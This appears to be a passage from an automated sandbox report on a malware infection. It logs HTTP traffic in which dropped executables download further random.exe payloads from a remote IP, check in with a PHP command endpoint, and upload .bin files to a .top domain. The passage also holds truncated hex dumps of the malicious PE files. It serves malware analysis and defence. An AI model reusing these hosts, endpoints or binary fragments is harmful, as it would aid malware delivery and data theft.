                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 0f 37 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 00 00 00 08 00 00 00 00 00 00 8e 6a 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 6a 00 00 4f 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 a8 69 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf7"0Lj @ `<jOi8 H.textJ L `.rsrcN@@.relocT@BpjH(7208s/(} }!}| (+| (*0P~,Brp(rp((rp(((o(*08s2(}(})}'|((+|((*0Hs/+~~ioX-rp(+*0rp( o!+*0rp( o!+
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843108892 CET224INData Raw: 00 06 2a 00 00 13 30 03 00 32 00 00 00 06 00 00 11 00 02 72 10 01 00 70 72 18 01 00 70 28 22 00 00 0a 6f 23 00 00 0a 0a 06 06 28 03 00 00 2b 28 04 00 00 2b 73 26 00 00 0a 28 27 00 00 0a 0b 2b 00 07 2a 00 00 1b 30 04 00 ad 00 00 00 07 00 00 11 00
                                                                                                                                                                                                                                                                          Data Ascii: *02rprp("o#(+(+s&('+*0s(rp( (+~%-&~s*%(+(+o-+@(.o/,%o0Xo1+o1(2
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843209982 CET1236INData Raw: 00 00 0a 2d b7 de 0f 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a 00 dc 06 13 07 2b 00 11 07 2a 00 00 00 01 10 00 00 02 00 49 00 4d 96 00 0f 00 00 00 00 13 30 03 00 65 00 00 00 08 00 00 11 00 02 72 f4 00 00 70 28 20 00 00 0a 28 05 00 00 2b 7e 0a 00 00
                                                                                                                                                                                                                                                                          Data Ascii: -o3+*IM0erp( (+~%-&~s*%(+(+~%-&~ s4%(++*0urpr&po#+=o6(+,X+
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843255043 CET1236INData Raw: 0b 07 06 fe 06 29 00 00 06 73 4f 00 00 0a 28 0c 00 00 2b 28 07 00 00 2b 0c 2b 00 08 2a 13 30 02 00 1c 00 00 00 10 00 00 11 00 28 51 00 00 0a 73 52 00 00 0a 0a 06 20 20 02 00 00 6f 53 00 00 0a 0b 2b 00 07 2a 1b 30 03 00 44 00 00 00 11 00 00 11 00
                                                                                                                                                                                                                                                                          Data Ascii: )sO(+(++*0(QsR oS+*0D(ToUsV%r&poW(X&r2poY((*(0Ls*s}{oZrRp(++s\(+(+
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843270063 CET448INData Raw: 7d 14 00 00 04 02 12 01 28 78 00 00 0a 7d 1a 00 00 04 02 02 7b 1a 00 00 04 7d 19 00 00 04 02 14 7d 1a 00 00 04 02 02 7b 17 00 00 04 18 18 16 20 00 10 00 00 17 73 79 00 00 0a 7d 1b 00 00 04 00 06 17 2e 02 2b 02 2b 51 00 02 7b 1b 00 00 04 02 7b 19
                                                                                                                                                                                                                                                                          Data Ascii: }(x}{}}{ sy}.++Q{{{iozoo({-C%}}|(+{|!%}(p/{,{o3}}/{
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843399048 CET1236INData Raw: 00 cf 01 00 00 1a 00 00 00 1e 00 00 01 06 2a 22 02 28 6e 00 00 0a 00 2a 00 1b 30 04 00 df 01 00 00 1a 00 00 11 02 7b 1f 00 00 04 0a 06 2c 02 2b 05 38 5d 01 00 00 00 02 28 7e 00 00 0a 6f 7f 00 00 0a 7d 22 00 00 04 02 7b 22 00 00 04 16 28 01 00 00
                                                                                                                                                                                                                                                                          Data Ascii: *"(n*0{,+8](~o}"{"(&(,rp((j(}#rp{#(~(&rp~(()}%rp{%oY((rp(rA
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843413115 CET1236INData Raw: 2f 12 02 7c 3c 00 00 04 fe 16 0f 00 00 1b 6f 33 00 00 0a 00 dc 02 7c 3c 00 00 04 fe 15 0f 00 00 1b 02 02 7b 29 00 00 04 28 0a 00 00 06 7d 33 00 00 04 72 ed 09 00 70 02 7b 33 00 00 04 8c 48 00 00 01 28 87 00 00 0a 28 19 00 00 0a 00 7e 05 00 00 04
                                                                                                                                                                                                                                                                          Data Ascii: /|<o3|<{)(}3rp{3H((~(~({)(}4r+p|4{H((rYp|4{H(({)(}5rp{5(({)(}6rp(
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843429089 CET1236INData Raw: 00 34 00 00 00 25 00 00 00 03 00 00 00 92 00 00 00 01 00 00 00 21 00 00 00 1b 00 00 00 06 00 00 00 01 00 00 00 10 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 07 00 00 00 13 00 00 00 00 00 2a 0a 01 00 00 00 00 00 06 00 81 09 ee 0d 06 00 ee 09 ee
                                                                                                                                                                                                                                                                          Data Ascii: 4%!*JrdId*ddddd^<dbR+QR*YRcfsR
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843444109 CET1236INData Raw: 05 0f 00 2c 25 00 00 00 00 91 00 6a 07 68 05 10 00 10 26 00 00 00 00 91 00 57 07 6d 05 11 00 e0 26 00 00 00 00 91 00 85 0a 6d 05 12 00 9c 27 00 00 00 00 91 00 4f 0f 76 05 13 00 c4 27 00 00 00 00 91 00 2c 0c 7a 05 13 00 24 28 00 00 00 00 91 00 a7
                                                                                                                                                                                                                                                                          Data Ascii: ,%jh&Wm&m'Ov',z$(|((O)~)OT*`*z**z*++ +
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843642950 CET1236INData Raw: 01 5c 00 af 0d 11 01 99 01 d9 07 c2 02 c9 01 34 0f e2 02 e1 00 af 0d e8 02 e1 00 26 07 ef 02 d9 01 35 10 fd 02 d9 01 57 0c 9b 00 e9 00 af 0d 10 00 e9 00 ab 05 10 00 01 01 49 0f 03 03 f1 00 c2 06 9b 00 b1 00 aa 0f 12 03 99 01 b8 0e 18 03 64 00 af
                                                                                                                                                                                                                                                                          Data Ascii: \4&5WId<|AJyQI}xWuWTu TAhIIlTto}A
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.962693930 CET1236INData Raw: 31 36 5f 30 00 3c 45 72 6d 69 74 74 6c 65 4d 61 78 69 6d 61 6c 65 57 6f 72 74 4c c3 a4 6e 67 65 3e 62 5f 5f 31 36 5f 30 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 32 36 5f 30 00 3c 3e 39 5f 5f 31 39 5f 30 00 3c 46 69 6e 64 65 57 c3 b6
                                                                                                                                                                                                                                                                          Data Ascii: 16_0<ErmittleMaximaleWortLnge>b__16_0<>c__DisplayClass26_0<>9__19_0<FindeWrterMitGrobuchstaben>b__19_0<ErkennenSprache>b__0<GeneriereZuflligenOrdnerNamen>b__0<vokaleUndKonsonanten>5__11<>s__21<>9__22_1<GeneriereAnagramme>b__2


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          20192.168.2.55003331.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:16.199908018 CET141OUTGET /files/karl/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          If-Modified-Since: Thu, 19 Dec 2024 14:25:14 GMT
                                                                                                                                                                                                                                                                          If-None-Match: "67642cca-5600"
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:17.525044918 CET190INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:17 GMT
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 14:25:14 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "67642cca-5600"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          21192.168.2.550045185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:20.181467056 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 65 30 3d 31 30 31 38 39 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: e0=1018974001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:21.517349005 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:21 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          22192.168.2.55004631.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:21.641185045 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036118984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:22 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 4454912
                                                                                                                                                                                                                                                                          Last-Modified: Sat, 21 Dec 2024 00:01:10 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "67660546-43fa00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 c0 c6 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 04 00 00 06 0e 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a4 c6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 a4 c6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcg(JILu2`I@D@ _rsr@ r4(@.rsrcrD(@.idata rF(@ `8rH(@vedrrjwb J(@ttdmcsvlC@.taggant0"C@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036150932 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036159992 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036319017 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036331892 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036343098 CET1236INData Raw: 0c c0 0e c0 8b 68 2a 43 41 3e 90 05 5e 90 5d 9f bd e4 cb 55 18 b1 1a 97 ae 4d bd b2 cd a6 ee 25 5e 54 87 86 fa b6 a9 32 c9 44 77 34 7e d6 a1 ae b2 46 13 32 56 99 da 6c 4d d5 3c ae d4 25 69 55 f9 73 d8 d6 68 33 86 a6 2d de fa 76 f3 4d 9f 65 56 06
                                                                                                                                                                                                                                                                          Data Ascii: h*CA>^]UM%^T2Dw4~F2VlM<%iUsh3-vMeVG}(9}25]&n]RM%m:2NR)W)@9RExD%U}W0)=d*r?A0u_qTV&t TkAe}=}>xxBe{Q(".3[D]c
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036355019 CET1236INData Raw: 4d 32 23 6c 28 3a db 31 3c 45 f1 15 6e c4 9a 05 09 25 a3 d5 33 59 24 5a 40 ba c1 39 0a 30 fe 6d 89 ee 66 59 94 15 eb c3 3c 1a 38 1b e7 04 da 2a 13 c6 ef ce 15 64 65 a3 f8 68 cb f8 44 3a dd d1 45 a5 59 54 fa d9 0d d5 48 f9 b7 64 79 2a 9f 3e d5 71
                                                                                                                                                                                                                                                                          Data Ascii: M2#l(:1<En%3Y$Z@90mfY<8*dehD:EYTHdy*>q |A;+ZwA}a\1Fs\LF#iF1m,/8aA#+2CY?/bex)PzM&}?c2}()xN%~LU~BjMPU
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036658049 CET552INData Raw: f8 66 3e 34 ad 9e 0e 9a 34 76 7b d8 d4 a7 38 3b 25 b6 a3 ff 6c 6f f1 5d d9 22 36 5a c5 3d 1d 08 e7 46 09 c8 18 95 81 06 11 20 25 d5 d6 34 c3 c2 0c 4d 1e 53 65 66 01 21 ad da 5d 3b 5c 29 cd cf ed 88 fa 3a fc ea bb dd ac 5e 5a 6b 1f b8 ce 29 55 ca
                                                                                                                                                                                                                                                                          Data Ascii: f>44v{8;%lo]"6Z=F %4MSef!];\):^Zk)UxJ.s-Pz)S)-2,_SRF!3hLe"lf.WRD#?qiG;]wNe+FQ:=\B~N|*"*#t^|
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036669970 CET1236INData Raw: 0b 98 35 4f b8 38 3e da b3 78 f7 aa af ea b7 49 53 ad a6 0c fa d1 78 e0 52 ee 22 d4 dc a4 3e 1e b1 9b b2 47 17 5b f7 00 80 7c 7b 0b da bb ce 3c 23 3a c2 b3 2b 9c 96 ce c0 69 82 da 58 9a a6 24 7b 9e fe 7e f0 8a 2a c5 a0 3f 3f 4a e8 f0 98 b0 02 64
                                                                                                                                                                                                                                                                          Data Ascii: 5O8>xISxR">G[|{<#:+iX${~*??JdBqN{8[f#,o>TTM/cB+js;Ka44`2E|"sXxUwX/v.3\Jd*X9Q^pw2u.$WD<iRKzEVP'V"{
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.036680937 CET1236INData Raw: 08 2a fc 7d 6a aa 6c a3 90 6e 11 6a 11 0e 00 57 4f 02 4f 8e 13 a9 1e 5c d5 10 c7 3d 17 7e 2a ad 90 07 1f f3 b7 f0 0f 4f 3e 34 a6 cd c8 e4 35 8c 55 08 e5 59 7e c5 8c e1 3c ae c5 1b 3c 3b da 9c 0c aa 0b be c3 fd 36 36 da c6 55 e5 eb 6d 5b e5 ce 3c
                                                                                                                                                                                                                                                                          Data Ascii: *}jlnjWOO\=~*O>45UY~<<;66Um[<H>DMH{0&\YRZVTT&?j>? 8Ty$2*Cut7fK!(1m^$~DdP6dYX$B:O*Cd.&zQ]qT!
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:23.157784939 CET1236INData Raw: d4 50 b0 82 04 e4 ae c5 3b 2e ca c7 23 25 59 5f b5 f2 6f 58 e2 ec 66 eb 3c 6f de 49 d5 32 2a 40 ab 3f 72 33 48 60 ae 60 25 56 d8 d0 53 cc ce b6 28 b3 da 31 86 9c 6a 1a 49 b1 93 7b 94 82 20 7e d6 1b 59 19 18 65 ff 32 f5 d2 1f 6b 59 30 ee 31 0f 0d
                                                                                                                                                                                                                                                                          Data Ascii: P;.#%Y_oXf<oI2*@?r3H``%VS(1jI{ ~Ye2kY01<2|%mHnQ*=C9Jc LC_fo;#y-ce*55u2VeMs%M$BOpUB/Fhv.1^/S~-31=$u+C*T(1.4


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          23192.168.2.550080185.121.15.192806704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:30.402539015 CET641OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                          Host: fivetk5ht.top
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Content-Length: 462
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------o9yPChBXfLqxO7aY1wxJGr
                                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 39 79 50 43 68 42 58 66 4c 71 78 4f 37 61 59 31 77 78 4a 47 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 75 66 6f 70 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 62 35 90 ba dc 99 76 79 75 b6 98 15 5b 1b 91 d9 12 07 d1 e2 6d c3 55 be 93 b8 8a db 17 db 4a 11 a3 39 99 21 fd 48 9c 4e b9 36 e1 64 c8 04 36 60 95 a1 8e 4e e4 ad f1 38 28 4f ff a2 bb 96 9d 24 1f 38 8e 6b 98 4a 95 ec 47 45 04 a0 e0 35 b3 92 b3 c5 67 52 e5 aa 0d 79 85 8d 5e a7 c7 28 29 b3 40 09 2f 5a 73 ab 93 99 e7 fa 4d a8 bf 2e 59 ce e2 8c f8 1a 2c 80 4c 20 49 c6 65 17 1f ef 1e 3f 8c f7 c6 58 06 12 92 2b 74 9c 00 c6 da 8d 3d 7e 42 54 2c 94 e6 a1 f1 3b 1f e1 cd 2d 6b 10 dd 82 ba e8 6f e8 45 e3 f9 83 6d 68 43 54 fa 75 f1 a9 c4 b1 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: --------------------------o9yPChBXfLqxO7aY1wxJGrContent-Disposition: form-data; name="file"; filename="Qufopu.bin"Content-Type: application/octet-streamb5vyu[mUJ9!HN6d6`N8(O$8kJGE5gRy^()@/ZsM.Y,L Ie?X+t=~BT,;-koEmhCTuY=ZJT9BEpSMf96QwT="JiO#fx$h--------------------------o9yPChBXfLqxO7aY1wxJGr--
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:31.865210056 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 2
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                                          X-RateLimit-Remaining: 29
                                                                                                                                                                                                                                                                          X-RateLimit-Reset: 1734741932
                                                                                                                                                                                                                                                                          ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                          Data Raw: 4f 4b
                                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          24192.168.2.550090185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:32.834767103 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018975001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:34.168675900 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:33 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          25192.168.2.550096185.121.15.192806704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.261446953 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                          Host: fivetk5ht.top
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Content-Length: 62345
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------qSjdJNZhr4FMeoVpfXnY7H
                                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 71 53 6a 64 4a 4e 5a 68 72 34 46 4d 65 6f 56 70 66 58 6e 59 37 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 75 66 6f 62 6f 6e 6f 64 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 53 bc 45 64 57 90 3d 07 c6 41 11 bc d5 ac 3f c8 27 51 66 e2 53 b0 29 2d 01 aa 38 27 1b 10 87 82 ab bf 1b 19 bf 22 85 19 97 24 d3 82 a6 4a 25 c3 da 9f 69 0c 1e b2 72 07 7c 7b 2f bd d2 f0 68 34 65 5f 74 92 c6 bc 15 51 72 a0 17 f5 c4 35 7a 65 6f f4 cb 9d 6d 85 79 52 cd c4 92 27 8a 99 72 34 cb 99 6b 24 00 14 b5 10 76 02 fe c0 68 c8 08 fb 66 d8 33 a0 39 c9 5d fa b3 06 4e c8 c1 86 cd df 27 24 01 ec 5d 43 40 28 70 98 47 9f 8c cd 8a 0b c9 95 f9 60 82 bf a8 21 ff be 9f d9 35 ac 34 2b 09 43 51 c5 23 11 45 01 a0 9d 37 ad 8a 61 0e [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: --------------------------qSjdJNZhr4FMeoVpfXnY7HContent-Disposition: form-data; name="file"; filename="Rufobonod.bin"Content-Type: application/octet-streamSEdW=A?'QfS)-8'"$J%ir|{/h4e_tQr5zeomyR'r4k$vhf39]N'$]C@(pG`!54+CQ#E7a{3Cj,Yu8m7ojFv#,F.~CViE==YCErqpU~87;:ks<fa4uRa4UPI'B-uO6MK]FF@hQspNg+D4HW7I|w|#iWr{|So3mHw@=+gVCdi27?1;cawdFjm+m2e>(^G4yjPHx[:0FZwcoLy[BS^C`nNm#G6 BK l;zQS5\`ULw|'=SJ&>l17wUADHYb1ZC},o.(s!P`6;,INC!:8eFK]>1E"g\F~=o{Y5'?pyZ],S`7m*!nDtc7bHXh8tf@{xeM]Ca [TRUNCATED]
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.381418943 CET19776OUTData Raw: 32 cb 7f ba e3 c5 34 25 88 43 5c 8f 43 0c b4 97 f2 a5 a3 95 00 e6 81 6a e1 2c 69 b0 0c a2 0e 95 2d 20 20 f5 10 a2 e9 89 17 68 ed cd 2d 73 d4 23 ae 29 f4 fa a0 a8 64 6e 8e 01 5d 15 28 d3 4c e2 1d d1 94 64 69 27 4f 2e 42 32 b1 51 6d a3 17 7e f1 79
                                                                                                                                                                                                                                                                          Data Ascii: 24%C\Cj,i- h-s#)dn](Ldi'O.B2Qm~yZ=1+#jC$'"Mj'3auOFYFUz:I4^QZ}(s?%o|2 _#-e2iVPAg9QPu@l.V*Z
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.381496906 CET2472OUTData Raw: 13 a0 1b 91 1b b2 e1 fd fe 76 6e 24 b8 9d f8 c7 2e 73 99 19 c6 d5 7a 5b 41 da fc ef 07 6f 8a 69 e3 a0 ad 43 e5 bb d4 a3 b7 52 db 9e 99 c6 a5 1e a8 75 5c bc 23 27 dc d3 8b d6 28 55 7c 14 5f 7d 86 04 d2 ba b7 91 d6 bb 20 a2 36 75 a3 fd 8b 23 7c 58
